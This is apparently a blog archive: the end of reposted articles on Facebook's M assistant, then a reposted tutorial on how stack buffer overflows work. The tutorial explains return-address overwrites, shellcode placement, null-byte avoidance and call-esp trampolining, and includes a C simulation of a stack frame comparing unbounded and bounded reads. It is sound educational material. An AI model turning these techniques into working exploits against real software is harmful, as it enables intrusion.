much more than your standard digital helper, suspects David Marcus, vice
president of messaging products at Facebook. “It can perform tasks that
none of the others can,” Marcus says. That’s because, in addition to
using artificial intelligence to complete its tasks, M is powered by
actual people.<br />
Companies from Google to Taskrabbit are engineering products to act
as superpowered personal assistants. Some, like Apple’s Siri, Google
Now, or Microsoft’s Cortana, rely entirely on technology, and though
they can be used by a lot of people, their range of tasks remains
limited. Others, like startups Magic and Operator or gig-economy
companies like TaskRabbit, employ people to respond to text-based
requests. These services can get nearly anything done—for a much smaller
number of folks. M is a hybrid. It’s a virtual assistant powered by
artificial intelligence as well as a band of Facebook employees, dubbed M
trainers, who will make sure that every request is answered.<br />
Facebook’s goal is to make Messenger the first stop for mobile
discovery. Google has long had search locked up on the desktop: Right
now, if I’m looking to treat my summer cold, and I’m in front of my
laptop, I begin by googling “cold meds Upper West Side.” On mobile,
however, I may pull up any number of apps–Google, Google Maps,
Twitter–to find that out, or I may just ask Siri. Facebook starts at a
disadvantage on mobile because it doesn’t have its own operating system,
and therefore users must download an app, and then open it. Marcus
hopes to make up for that by creating a virtual assistant so powerful,
it’s the first stop for anyone looking to do or buy anything.<br />
“We start capturing all of your intent for the things you want to
do,” says Marcus. “Intent often leads to buying something, or to a
transaction, and that’s an opportunity for us to [make money] over
time.”<br />
If M can provide a more efficient service than its competitors,
Facebook can boost the number of people using it on mobile, and
eventually spur revenue from their transactions. That’s the kind of
win-win Marcus was brought in to accomplish at Facebook, which in June
2014 hired him away from PayPal, where he had been CEO. In less than two
years, Facebook has more than tripled Messenger’s users to 700 million.<br />
<h3>
How It Works</h3>
To try the new service, users will tap a small button at the bottom
of the Messenger app to send a note to M, the same way they might
message anyone on Facebook. M’s software will decode the natural
language, ask followup questions in the message thread, and send updates
as the task is completed. Users won’t necessarily know whether a
computer or a person has helped them; unlike Siri and Cortana, M has no
gender.<br />
<figure class="carve wp-caption portrait alignnone fade-in-up" data-js="fader" id="attachment_1841897"><a href="https://www.blogger.com/null" role="presentation" tabindex="-1"><img alt="m-example-02-press" class="size-inset-image wp-image-1841897 cursor-zoom" data-order="1" data-ui="overlayOpen" height="563" src="http://www.wired.com/wp-content/uploads/2015/08/m-example-02-press-289x563.jpg" width="289" /></a><figcaption class="wp-caption-text link-underline"><span class="credit link-underline-sm"><span class="ui ui ui-illo inline-block ui-credit relative opacity-5 marg-r-micro"></span> Facebook</span></figcaption></figure>
For now, M doesn’t pull from the social data Facebook collects to
complete tasks. So, if you request a gift for your spouse, the service
will make suggestions based only on your answers to questions it asks
you and previous conversations you and M have had. Marcus says that may
change “at some point, with proper user consent.” The service is free,
and will be available to all Facebook Messenger users eventually.<br />
In internal tests, Facebook employees have been using M for several
weeks to do everything from organizing dinner parties to tracking down
an unusual beverage in New Orleans. “An engineer went to Paris for a
couple days, and his friend asked M to redecorate his desk in a French
style,” Marcus says. “Twenty-four hours later, the desk was decorated
with a proper napkin, baguette bread, and a beret.” One of M’s most
popular requests from its Facebook employee testers: the service can
call your cable company and endure the endless hold times and automated
messages to help you set up home wifi or cancel your HBO.<br />
<h3>
The Human Element</h3>
The thing is: that’s a person on hold on your behalf. Facebook’s M
trainers have customer service backgrounds. They make the trickier
judgment calls, and perform other tasks that software can’t. If you ask M
to plan a birthday dinner for your friend, the software might book the
Uber and the restaurant, but a person might surprise your friend at the
end of the night by sending over birthday cupcakes from her favorite
bakery. “M learns from human behaviors,” says Marcus. <br />
<figure class="carve wp-caption portrait alignnone fade-in-up" data-js="fader" id="attachment_1841896"><a href="https://www.blogger.com/null" role="presentation" tabindex="-1"><img alt="m-example-01-press" class="size-inset-image wp-image-1841896 cursor-zoom" data-order="2" data-ui="overlayOpen" height="563" src="http://www.wired.com/wp-content/uploads/2015/08/m-example-01-press-289x563.jpg" width="289" /></a><figcaption class="wp-caption-text link-underline"><span class="credit link-underline-sm"><span class="ui ui ui-illo inline-block ui-credit relative opacity-5 marg-r-micro"></span> Facebook</span></figcaption></figure>
Eventually, the service might be sophisticated enough to figure this
out on its own, but not soon. Right now, M trainers sit close to the
engineering team inside Facebook offices. The company confirms the
trainers are contractors but won’t say how many there are. Marcus
anticipates that over time, Facebook will employ thousands of them,
which will represent a substantial economic investment.<br />
The company anticipates the cost will be offset by the revenue growth
it is able to realize by capitalizing on M’s interactions. <a href="http://www.wired.com/2015/08/facebook-launches-m-new-kind-virtual-assistant/www.wired.com/2015/08/how-facebook-m-works/">As WIRED’s Cade Metz explains</a>,
Facebook plans to use data generated by the service to feed much more
complex AI systems that can reduce the burden on the trainers. <br />
<h3>
Open for Business</h3>
It’s not hard to imagine the business opportunities that M could
spawn. For one, should Facebook discover a business is getting lots of
inbound requests, it could partner with that company to offer a more
direct, efficient service over Messenger.<br />
<section class="post-container clearfix relative" data-js="post" id="start-of-content" tabindex="0"><article class="content link-underline relative body-copy" data-js="content" itemprop="articleBody">“If, for instance, you have a lot of calls that have to be placed by people to cable companies,” says Marcus, “That’s a pretty
good signal that their customers would actually like a better way to
interact with the company and maybe they should have a presence inside
of Messenger directly.”<br />
Facebook is already helping firms offer customer service through
Messenger. At the company’s March developer conference, Marcus announced
Businesses on Messenger, a feature that allows businesses to send
receipts, notify customers their packages have shipped, and provide
basic customer service.<br />
Marcus won’t offer metrics to suggest whether the feature has caught
on among companies, but he says they have shown a lot of interest, and
his team is beginning to work out some of the kinks. “We have a lot of
threads open between businesses and people, and the engagement is very
good,” says Marcus. “Now we want to open it to more businesses.”<br />
<h3>
Beyond the Valley</h3>
Marcus anticipates that M will expand slowly over time, but that it
will eventually reach everyone. As this happens, the array of tasks it
performs will certainly grow. Facebook is, by design, rolling out its
new assistant in a community in which the users are demographically
similar to the M trainers who will be thinking up gifts for their
spouses and fun vacation destinations for them.<br />
It’s safe to say that most of Messenger’s 700 million users around
the world aren’t looking to book an Uber for a friend’s birthday party
or choose between Cancun and Maui for February break. Will M be as good
at helping users in the Bronx access food stamps? How about coming to
the aid of the single mother in Oklahoma who has a last-minute childcare
issue? Marcus is up for the challenge, and so, he says, is M.</article><article class="content link-underline relative body-copy" data-js="content" itemprop="articleBody"><div class="p1">
M combines the power of a world-leading artificial
intelligence lab with the dexterity of humans Facebook can afford to
hire and the scale of its 700 million user Messenger app.</div>
<div class="p1">
As I <a href="http://techcrunch.com/2015/08/26/facebook-is-adding-a-personal-assistant-called-m-to-your-messenger-app/">noted earlier</a>,
while Google and Apple were dicking around with the pure science of
artificial intelligence, Facebook used human helpers to brute force a
full-featured assistant. The closest thing to M might be the third-party
app <a href="https://www.techinasia.com/wesecretary-magic-for-wechat/" target="_blank">WeSecretary built atop WeChat.</a></div>
<div class="p1">
<img alt="11890988_10156070655185195_4945843629380291283_n" class="alignright wp-image-1201078" height="344" src="https://tctechcrunch2011.files.wordpress.com/2015/08/11890988_10156070655185195_4945843629380291283_n1.jpg?w=300&h=344" width="300" />Making M work for all of Messenger’s users might be slow or expensive, but it’ll probably be both.</div>
<div class="p1">
Eventually, M would ideally work with minimal human
assistance. To get there, Facebook needs time for its M contractors to
teach it the best way to solve problems. With a small workforce and
small beta, that could take a while. Growing M’s test base and the
legions of helpers behind it will cost a ton.</div>
<div class="p1">
But that’s why Facebook is so distinctly well-equipped. It
has money. Not quite Google or Apple money, but with $4 billion in
revenue and around <a href="http://techcrunch.com/2015/07/29/facebook-earnings-q2-2015/">$700 million in profit</a> last quarter, Facebook has resources to throw at M.</div>
<div class="p1">
It also has time. Facebook’s ownership of both Messenger
and the 800 million-user WhatsApp gives it a decisive lead in messaging.
It doesn’t have to worry about falling further behind while it
concentrates on R&D. I’m looking at you, Google Hangouts/Messenger.</div>
<div class="p1">
And finally, with both Messenger and WhatsApp in its
possession, Facebook has arguably the best ways to leverage a chat-based
personal assistant.</div>
<div class="p1">
<img alt="11898862_10156070655505195_4986153176672234416_n" class="alignright wp-image-1201073" height="585" src="https://tctechcrunch2011.files.wordpress.com/2015/08/11898862_10156070655505195_4986153176672234416_n1.jpg?w=300&h=585" width="300" />How will Facebook recoup this massive investment? There are plenty of ways M could make money.</div>
<div class="p1">
For example, Facebook could establish relationships with
certain product or service vendors, earning a cut for making them M’s
go-to provider for certain requests. Similar to how Shyp earns money on
the difference between the bulk shipping discounts it gets and what it
charges users, Facebook could surely find some margin to absorb it if it
can power frictionless personal assistant shopping and travel booking.</div>
<div class="p1">
Then there’s the massive opportunity to run M-triggering
ads. Imagine a Facebook ad that prompts you to message M and set up an
appointment at a local barber or restaurant. Facebook already has <a href="https://www.facebook.com/business/news/high-growth-markets" target="_blank">“Missed Call” ads</a>
in India that get you to call a business and immediately hang up so you
aren’t charged, then get called back by the business with more info.</div>
<div class="p1">
And there’s always the potential it could just charge users directly for the service, though that’s really not Facebook’s style.</div>
<div class="p1">
But the beauty of Facebook’s strategy is that it doesn’t
have to monetize M, or Messenger, directly. While competitors scramble
for ways to earn cash, Messenger lets its parent app handle the
finances.</div>
<div class="p1">
All Facebook has to do with M is make Messenger more
useful, and thereby used more. The chat app locks people into Facebook’s
social network, and that’s where it keeps the real money-maker: the
ad-filled News Feed.</div>
</article></section></div>
<br /></div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com4tag:blogger.com,1999:blog-4509349481580895365.post-60988551732299560782015-08-27T12:51:00.000+05:302015-08-27T12:51:16.138+05:30How Buffer overflow works tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends,<br />
<br />
The following article illustrates how a buffer overflow works:<br />
<br />
<section id="article-guts">
<div class="article-content clearfix" itemprop="articleBody">
<figure class="intro-image image center full-width" style="width: 700px;">
<img height="360" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/buffer-overflow.jpg" width="700" />
<figcaption class="caption">
<div class="caption-credit">
Aurich Lawson / Thinkstock </div>
</figcaption>
</figure>
The buffer overflow has long been a feature of the computer
security landscape. In fact the first self-propagating Internet
worm—1988's Morris Worm—used a buffer overflow in the Unix <code>finger</code>
daemon to spread from machine to machine. Twenty-seven years later,
buffer overflows remain a source of problems. Windows infamously
revamped its security focus after two buffer overflow-driven exploits in
the early 2000s. And <a href="http://arstechnica.com/security/2015/05/90s-style-security-flaw-puts-millions-of-routers-at-risk/">just this May</a>, a buffer overflow found in a Linux driver left (potentially) millions of home and small office routers vulnerable to attack.<br />
At its core, the buffer overflow is an astonishingly simple bug that
results from a common practice. Computer programs frequently operate on
chunks of data that are read from a file, from the network, or even from
the keyboard. Programs allocate finite-sized blocks of
memory—buffers—to store this data as they work on it. A buffer overflow
happens when more data is written to or read from a buffer than the
buffer can hold.<br />
On the face of it, this sounds like a pretty foolish error. After
all, the program knows how big the buffer is, so it should be simple to
make sure that the program never tries to cram more into the buffer than
it knows will fit. You'd be right to think that. Yet buffer overflows
continue to happen, and the results are frequently a security
catastrophe.<br />
To
understand why buffer overflows happen—and why their impact is so
grave—we need to understand a little about how programs use memory and a
little more about how programmers write their code. (Note that
we'll look primarily at the stack buffer overflow. It's not the only
kind of overflow issue, but it's the classic, best-known kind.)
<h2>
Stack it up</h2>
Buffer overflows create problems only for native code—that is,
programs which use the processor's instruction set directly rather than
through some intermediate form such as in Java or Python. The overflows
are tied to the way the processor and native code programs manipulate
memory. Different operating systems have their own quirks, but every
platform in common use today follows essentially the same pattern. To
understand how these attacks work and some of the things people do to
try to stop them, we first have to understand a little about how that
memory is used.<br />
The most important central concept is the memory address. Every
individual byte of memory has a corresponding numeric address. When the
processor loads and stores data from main memory (RAM), it uses the
memory address of the location it wants to read and write from. System
memory isn't just used for data; it's also used for the executable code
that makes up our software. This means that every function of a running
program also has an address.<br />
In the early days of computing, processors and operating systems used
physical memory addresses: each memory address corresponded directly to
a particular piece of RAM. While some pieces of modern operating
systems still have to use these physical memory addresses, all of
today's operating systems use a scheme called virtual memory.<br />
With virtual memory, the direct correspondence between a memory
address and a physical location in RAM is broken. Instead, software and
the processor operate using virtual memory addresses. The operating
system and processor together maintain a mapping between virtual memory
addresses and physical memory addresses.<br />
This virtualization enables a range of important features. The first and foremost is <em>protected memory</em>. Every individual process gets its <em>own</em>
set of addresses. For a 32-bit process, those addresses start at zero
(for the first byte) and run up to 4,294,967,295 (or in hexadecimal, <code>0xffff'ffff</code>; 2<sup>32</sup> - 1). For a 64-bit process, they run all the way up to 18,446,744,073,709,551,615 (<code>0xffff'ffff'ffff'ffff</code>, 2<sup>64</sup> - 1). So, every process has its own address <code>0</code>, its own address <code>1</code>, its own address <code>2</code>, and so on and so forth.<br />
(For the remainder of this article, I'm going to stick to talking
about 32-bit systems, except where otherwise noted. 32- and 64-bit
systems work in essentially the same ways, so everything translates well
enough; it's just a little clearer to stick to one bitness.)<br />
Because each process gets its own set of addresses, this scheme is a
very straightforward way to prevent one process from damaging the
memory of any other: all the addresses that a process can use reference
memory belonging only to that process. It's also much easier for the
processes to deal with; physical memory addresses, while they broadly
work in the same way (they're just numbers that start at zero), tend to
have wrinkles that make them annoying to use. For example, they're
usually not contiguous; address <code>0x1ff8'0000</code> is used for the
processor's System Management Mode memory; a small chunk of physical
memory that's off limits to normal software. Memory from PCIe cards also
generally occupies some of this address space. Virtual addresses have
none of these inconveniences.<br />
So what does a process have in its address space? Broadly speaking,
there are four common things, of which three interest us. The
uninteresting one is, in most operating systems, "the operating system
kernel." For performance reasons, the address space is normally split
into two halves, with the bottom half being used by the program and the
top half being the kernel's address space. The kernel-half of the memory
is inaccessible to the program's half, but the kernel itself can read
the program's memory. This is one of the ways that data is passed to
kernel functions.<br />
The first things that we need to care about are the executables and
libraries that constitute the program. The main executable and all its
libraries are all loaded into the process' address space, and all of
their constituent functions accordingly have memory addresses.<br />
The second is the memory that the program uses for storing the data
it's working on, generally called the heap. This might be used, for
example, to store the document currently being edited, the webpage (and
all its JavaScript objects, CSS, and so on) being viewed, or the map for
the game being played.<br />
The third and most important is the call stack, generally just called
the stack. This is the most complex aspect. Every thread in a process
has its own stack. It's a chunk of memory that's used to keep track of
both the function that a thread is currently running, as well as all the
predecessor functions—the ones that were called to get to the current
function. For example, if function <code>a</code> calls function <code>b</code>, and function <code>b</code> calls function <code>c</code>, then the stack will contain information about <code>a</code>, <code>b</code>, and <code>c</code>, in that order.<br />
<figure class="image right medium" style="width: 300px;"><a class="enlarge" data-height="1837" data-width="1080" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack.png"><img height="510" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-300x510.png" width="300" /></a><figcaption class="caption"><div class="caption-text">
Here we see the basic layout of our stack with a 64 character buffer called <code>name</code>, then the frame pointer, and then the return address. <code>esp</code> has the address of the top of the stack, <code>ebp</code> has the address of the frame pointer.</div>
</figcaption></figure>
The call stack is a specialized version of the more general "stack"
data structure. Stacks are variable-sized structures for storing
objects. New objects can be added ("pushed") to one end of the stack
(conventionally known as the "top" of the stack), and objects can be
removed ("popped") from the stack. Only the top of the stack can be
modified with a push or a pop, so the stack forces a kind of sequential
ordering: the most recently pushed item is the one that gets popped
first. The first item that gets pushed on the stack is the last one that
gets popped.<br />
The most important thing that the call stack does is to store <em>return addresses</em>.
Most of the time, when a program calls a function, that function does
whatever it is supposed to do (including calling other functions), and
then returns to the function that called it. To go back to the calling
function, there must be a record of what that calling function was:
execution should resume from the instruction <em>after</em> the function
call instruction. The address of this instruction is called the return
address. The stack is used to maintain these return addresses: whenever a
function is called, the return address is pushed onto the stack.
Whenever a function returns, the return address is popped off the stack,
and the processor begins executing the instruction at that address.<br />
This stack functionality is so fundamentally important that most, if
not all, processors include built-in support for these concepts.
Consider x86 processors. Among the registers (small storage locations in
the processor that can be directly accessed by processor instructions)
that x86 defines, the two that are most important are <code>eip</code>, standing for "instruction pointer," and <code>esp</code>, standing for stack pointer.<br />
<code>esp</code> always contains the address of the top of the stack. Each time something is pushed onto the stack, the value in <code>esp</code> is decreased. Each time something is popped from the stack, the value of <code>esp</code> is increased. This means that the stack grows "down;" as more things are pushed onto the stack, the address stored in <code>esp</code> gets lower and lower. In spite of this, the memory location referenced by <code>esp</code> is still called the "top" of the stack.<br />
<code>eip</code> gives the address of the currently executing instruction. The processor maintains <code>eip</code> itself. It reads the instruction stream from memory and increments <code>eip</code> accordingly so that it always has the instruction's address. x86 has an instruction for function calls, named <code>call</code>, and another one for returning from a function, named <code>ret</code>.<br />
<code>call</code> takes one operand; the address of the function to
call (though there are several different ways that this can be
provided). When a <code>call</code> is executed, the stack pointer <code>esp</code> is decremented by 4 bytes (32 bits), and the address of the instruction following the <code>call</code>, the return address, is written to the memory location now referenced by <code>esp</code>—in other words, the return address is pushed onto the stack. <code>eip</code> is then set to the address specified as operand to <code>call</code>, and execution continues from that address.<br />
<code>ret</code> does the opposite. The simple <code>ret</code> doesn't take any operands. The processor first reads the value from the memory address contained in <code>esp</code>, then increments <code>esp</code> by 4 bytes—it pops the return address from the stack. <code>eip</code> is set to this value, and execution continues from that address.<br />
<br />
The real problem comes with everything else that goes on the stack,
too. The stack happens to be a quick and efficient place for storing
data. Storing data on the heap is relatively complex; the program needs
to keep track of how much space is available on the heap, how much space
each piece of data is using, and various other bits of bookkeeping. The
stack, by contrast, is simple; to make space for some data, just decrement
the stack pointer. To tidy up when the data is no longer needed,
increment the stack pointer.
<br />
This convenience makes the stack a logical place to store the
variables that belong to a function. A function has a 256 byte buffer to
read some user input? Easy, just subtract 256 from the stack pointer
and you've created the buffer. At the end of the function, just add 256
back onto the stack pointer, and the buffer is discarded.<br />
<figure class="image right medium" style="width: 300px;"><a class="enlarge" data-height="1837" data-width="1080" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-normal-usage.png"><img height="510" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-normal-usage-300x510.png" width="300" /></a><figcaption class="caption"><div class="caption-text">
When we use the program correctly, the keyboard input is stored in the <code>name</code> buffer, followed by a null (zero) byte. The frame pointer and return address are unaltered.</div>
</figcaption></figure>
There are limitations to this. The stack isn't a good place to store
very large objects; the total amount of memory available is usually
fixed when a thread is created, and that's typically around 1MB in size.
These large objects <em>must</em> be placed on the heap instead. The
stack also isn't usable for objects that need to exist for longer than
the span of a single function call. Because every stack allocation is
undone when a function exits, any objects that exist on the stack can
only live as long as a function is running. Objects on the heap,
however, have no such restriction; they can hang around forever.<br />
This stack storage isn't just used for the named variables that
programmers explicitly create in their programs; it can also be used for
storing whatever other values the program may need to store. This is
traditionally a particularly acute concern on x86. x86 processors don't
have very many registers (there are only 8 integer registers in total,
and some of those, like <code>eip</code> and <code>esp</code>, already
have special purposes), and so functions can rarely keep all the values
they need in registers. To free up space in a register while still
ensuring that its current value can be retrieved later, the compiler
will push the value of the register onto the stack. The value can then
be popped later to put it back into a register. In compiler jargon, this
process of saving registers so that they can be re-used is called <em>spilling</em>.<br />
Finally, the stack is often used to pass arguments to functions. The
calling function pushes each argument in turn onto the stack; the called
function can then pop the arguments off. This isn't the only way of
passing arguments—they can be passed in registers too, for example—but
it's one of the most flexible.<br />
The set of things that a function has on the stack—its local
variables, its spilled registers, and any arguments it's preparing to
pass to another function—is called a "stack frame." Because data within
the stack frame is used so extensively, it's useful to have a way of
quickly referencing it.<br />
The stack pointer <em>can</em> do this, but it's somewhat awkward:
the stack pointer always points to the top of the stack, and so it moves
around as things are pushed and popped. For example, a variable may
start out with an address of <code>esp + 4</code>. Two more values might be pushed onto the stack, meaning that the variable now has to be accessed at <code>esp + 12</code>. One of those values can then get popped off, so the variable is now at <code>esp + 8</code>.<br />
This isn't an insurmountable difficulty, and compilers can easily
handle the challenge. Still, it can make using the stack pointer to
access anything other than "the top of the stack" awkward, especially
for the hand-coded assembler.<br />
To make things easier, it's common to maintain a second pointer, one that consistently stores the address of the <em>bottom</em> (start) of each stack frame—a value known as the <em>frame pointer</em>—and on x86, there's even a register that's generally used to store this value, <code>ebp</code>.
Since this never changes within a given function, this provides a
consistent way to access a function's variables: a value that's at <code>ebp - 4</code> will remain at <code>ebp - 4</code>
for the whole of a function. This isn't just useful for humans; it also
makes it easier for debuggers to figure out what's going on.<br />
<div class="centered-figure-container">
<figure class="image center full-width" style="width: 980px;"><a class="enlarge" data-height="600" data-width="1734" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/visual-studio.png"><img height="339" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/visual-studio-980x339.png" width="980" /></a><figcaption class="caption"><div class="caption-text">
This screenshot from Visual Studio shows some of this in action for a
simple x86 program. On x86 processors, the register named <code>esp</code> contains the address of the top of the stack, in this case <code>0x0018ff00</code>, highlighted in blue (on x86, the stack actually grows downwards, toward memory address <code>0</code>, but it's still called the top of the stack anyway). This function only has one stack variable, <code>name</code>, highlighted in pink. It's a fixed size 32-byte buffer. Because it's the only variable, its address is also <code>0x0018ff00</code>, the same as the top of the stack.
x86 also has a register called <code>ebp</code>, highlighted in red,
that's (normally) dedicated to storing the location of the frame
pointer. The frame pointer is placed immediately after the stack
variables. Right after the frame pointer is the return address,
highlighted in green. The return address references a code fragment with
address <code>0x00401048</code>. This instruction comes immediately after a <code>call</code> instruction, making clear the way the return address is used to resume execution from where the calling function left off.</div>
</figcaption></figure></div>
<figure class="image right medium" style="width: 300px;"><a class="enlarge" data-height="1989" data-width="1080" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-overflow-a.png"><img height="553" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-overflow-a-300x553.png" width="300" /></a><figcaption class="caption"><div class="caption-text">
Unfortunately <code>gets()</code> is a really stupid function. If we just hold down A on the keyboard it won't stop once it's filled the <code>name</code>
buffer. It'll just keep on writing data to memory, overwriting the
frame pointer, the return address, and anything and everything else it
can.</div>
</figcaption></figure>
<code>name</code> in the above screenshot is the kind of buffer
that's regularly overflowed. Its size is fixed at exactly 64 characters.
In this case it's filled with a bunch of numbers, and it ends in a
final null. As should be clear from the above picture, if more than 64
bytes are written into the <code>name</code> buffer, then other values
on the stack will be damaged. If four extra bytes are written, the frame
pointer will be destroyed. If <em>eight</em> extra bytes are written, both the frame pointer and the return address get overwritten.<br />
Clearly this will lead to damaging the program's data, but the
problem of buffer overflows is more serious: they often lead to code
execution. This happens because those overflowed buffers won't just
overwrite data. They can also overwrite the other important thing kept
on the stack—those return addresses. The return address controls which
instructions the processor will execute when it's finished with the
current function; it's meant to be some location within the calling
function, but if it gets overwritten in a buffer overflow, it could
point anywhere. If attackers can control the buffer overflow, they can
control the return address; if they can control the return address, they
can choose what code the processor executes next.<br />
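The frame layout and the <code>call</code>/<code>ret</code> behaviour described above can be traced in a small simulation. This is an added example, not code from the original article: it models a 32-bit stack in a byte array instead of corrupting a real one, and compares a <code>gets()</code>-style unbounded read with an <code>fgets()</code>-style bounded read. All addresses except the screenshot's return address <code>0x00401048</code> are constructed, and the function names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STACK_TOP   0x00190000u  /* constructed: one past the highest stack byte */
#define STACK_SIZE  256u
#define NAME_LEN    64u          /* size of the article's name buffer */
#define RETURN_ADDR 0x00401048u  /* return address from the article's screenshot */
#define CALLER_EBP  0x0018ff90u  /* constructed: the caller's frame pointer */

struct cpu { uint32_t eip, esp, ebp; uint8_t mem[STACK_SIZE]; };
struct result { uint32_t eip, ebp, esp; };   /* register state after ret */

/* Translate a simulated address into the backing array. */
static uint8_t *at(struct cpu *c, uint32_t addr) {
    return &c->mem[addr - (STACK_TOP - STACK_SIZE)];
}
static void store32(struct cpu *c, uint32_t addr, uint32_t v) {
    for (int i = 0; i < 4; i++) *at(c, addr + i) = (uint8_t)(v >> (8 * i));
}
static uint32_t load32(struct cpu *c, uint32_t addr) {
    uint32_t v = 0;
    for (int i = 0; i < 4; i++) v |= (uint32_t)*at(c, addr + i) << (8 * i);
    return v;
}
/* push: esp goes down by 4, then the value is written at the new top. */
static void push32(struct cpu *c, uint32_t v) { c->esp -= 4; store32(c, c->esp, v); }
static uint32_t pop32(struct cpu *c) { uint32_t v = load32(c, c->esp); c->esp += 4; return v; }

/* gets()-like: copies the input and its terminating NUL without ever checking
 * the buffer size. The STACK_TOP test only keeps the simulation in bounds. */
static void read_unbounded(struct cpu *c, uint32_t buf, const char *in) {
    size_t n = strlen(in);
    for (size_t i = 0; i <= n && buf + i < STACK_TOP; i++)
        *at(c, buf + (uint32_t)i) = (uint8_t)in[i];
}
/* fgets()-like: writes at most size bytes, terminator included. */
static void read_bounded(struct cpu *c, uint32_t buf, uint32_t size, const char *in) {
    uint32_t i = 0;
    for (; i + 1 < size && in[i] != '\0'; i++) *at(c, buf + i) = (uint8_t)in[i];
    *at(c, buf + i) = 0;
}

/* One call of a function that has a 64-byte local buffer called name. */
struct result run_greeting(const char *input, int bounded) {
    struct cpu c;
    memset(&c, 0, sizeof c);
    c.esp = STACK_TOP - 16;
    c.ebp = CALLER_EBP;
    push32(&c, RETURN_ADDR);       /* call: push the return address ...      */
    c.eip = 0x00401000u;           /* ... and jump (constructed target)      */
    push32(&c, c.ebp);             /* prologue: push ebp                     */
    c.ebp = c.esp;                 /*           mov ebp, esp                 */
    c.esp -= NAME_LEN;             /*           sub esp, 64  (name == esp)   */
    if (bounded) read_bounded(&c, c.esp, NAME_LEN, input);
    else         read_unbounded(&c, c.esp, input);
    c.esp = c.ebp;                 /* epilogue: mov esp, ebp                 */
    c.ebp = pop32(&c);             /*           pop ebp                      */
    c.eip = pop32(&c);             /* ret: pop the return address into eip   */
    struct result r = { c.eip, c.ebp, c.esp };
    return r;
}

/* Feed n 'A' characters, as if the key were held down. */
struct result run_with_length(size_t n, int bounded) {
    char in[128];
    if (n > sizeof in - 1) n = sizeof in - 1;
    memset(in, 'A', n);
    in[n] = '\0';
    return run_greeting(in, bounded);
}

int main(void) {
    const size_t lens[] = { 63, 64, 68, 72 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        struct result u = run_with_length(lens[i], 0);
        struct result b = run_with_length(lens[i], 1);
        printf("%2zu chars  gets-like: ebp=%08x eip=%08x   fgets-like: ebp=%08x eip=%08x\n",
               lens[i], (unsigned)u.ebp, (unsigned)u.eip, (unsigned)b.ebp, (unsigned)b.eip);
    }
    return 0;
}
```

With the unbounded read, 64 typed characters are already enough to damage the saved frame pointer, because the terminating null byte lands on its lowest byte; the bounded read returns to <code>0x00401048</code> for every input length.<br />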
The process probably won't have some nice, convenient "compromise the
machine" function for the attacker to run, but that doesn't really
matter. The same buffer that was used to overwrite the return address
can also be used to hold a short snippet of executable code, called
shellcode, that will in turn download a malicious executable, or open up
a network connection, or do whatever else the attacker fancies.<br />
Traditionally, this was trivial to do because of a trait that may
seem a little surprising: generally, each program would use the same
memory addresses each time you ran it, even if you rebooted in between.
This means that the location of the buffer on the stack would be the
same each time, and so the value used to overwrite the return address
could be the same each time. An attacker only had to figure out what the
address was once, and the attack would work on <em>any</em> computer running the flawed code.<br />
<div class="superscroll-placeholder loaded" data-page="1">
<div class="superscroll-content show">
<h2>
An attacker's toolkit</h2>
In an ideal world—for the attacker, that is—the overwritten return
address can simply be the address of the buffer. When the program is
reading input from a file or a network, for example, this can often be
the case.<br />
Other times the attacker has to employ tricks. In functions that
process human-readable text, the zero byte (or "null") is often treated
specially; it indicates the end of a string, and the functions used for
manipulating strings—copying them, comparing them, combining them—will
stop whenever they hit the null character. This means that if the
shellcode contains the null character, those routines are liable to
break it.<br />
<div class="centered-figure-container">
<figure class="video center" style="width: 980px;"><div style="height: 552px; width: 980px;">
</div>
<figcaption class="caption"><div class="caption-text">
See a buffer
overflow in action. In this video, we put shellcode into the buffer and
then overwrite the return address to execute it. Our shellcode runs the
Windows calculator.</div>
</figcaption></figure></div>
<figure class="image right medium" style="width: 300px;"><a class="enlarge" data-height="1837" data-width="1413" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit.png"><img height="390" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit-300x390.png" width="300" /></a><figcaption class="caption"><div class="caption-text">
To exploit the overflow, instead of just writing As and smashing
everything, the attacker fills the buffer with shellcode: a short piece
of executable code that will perform some action of the attacker's
choosing. The return address is then overwritten with an address
referring to the buffer, directing the processor to execute the
shellcode when it tries to return from a function call.</div>
</figcaption></figure>
To handle this, attackers can use various techniques. Pieces of code
can convert shellcode that contains null characters into equivalent
sequences that avoid the problem byte. They can even handle quite strict
restrictions; for example, an exploitable function may only accept
input that can be typed on a standard keyboard.<br />
The address of the stack itself often contains a null byte, which is
similarly problematic: it means that the return address cannot be
directly set to the address of the stack buffer. Sometimes this isn't a
big issue, because some of the functions that are used to fill (and,
potentially, overflow) buffers will write a null byte themselves. With
some care, they can be used to put the null byte in just the right place
to set the return address to that of the stack.<br />
Even when that isn't possible, this situation can be handled with
indirection. The program and all its libraries mean that memory is
littered with executable code. Much of this executable code will have an
address that's "safe," which is to say has no null bytes.<br />
What the attacker has to do is find a usable address that contains an instruction such as x86's <code>call esp</code>,
which treats the value of the stack pointer as the address of a
function and begins executing it—a perfect match for a stack buffer that
contains the shellcode. The attacker then uses the address of the <code>call esp</code>
instruction to overwrite the return address; the processor will take an
extra hop through this address but still end up running the shellcode.
This technique of bouncing through another address is called
"trampolining."<br />
<figure class="image right medium" style="width: 300px;"><a class="enlarge" data-height="1837" data-width="1502" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit-trampoline.png"><img height="367" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit-trampoline-300x367.png" width="300" /></a><figcaption class="caption"><div class="caption-text">
Sometimes it can be difficult to overwrite the return address with the
address of the buffer. To handle this, we can overwrite the return
address with the address of a piece of executable code found within the
victim program (or its libraries). This fragment of code will transfer
execution to the buffer for us.</div>
</figcaption></figure>
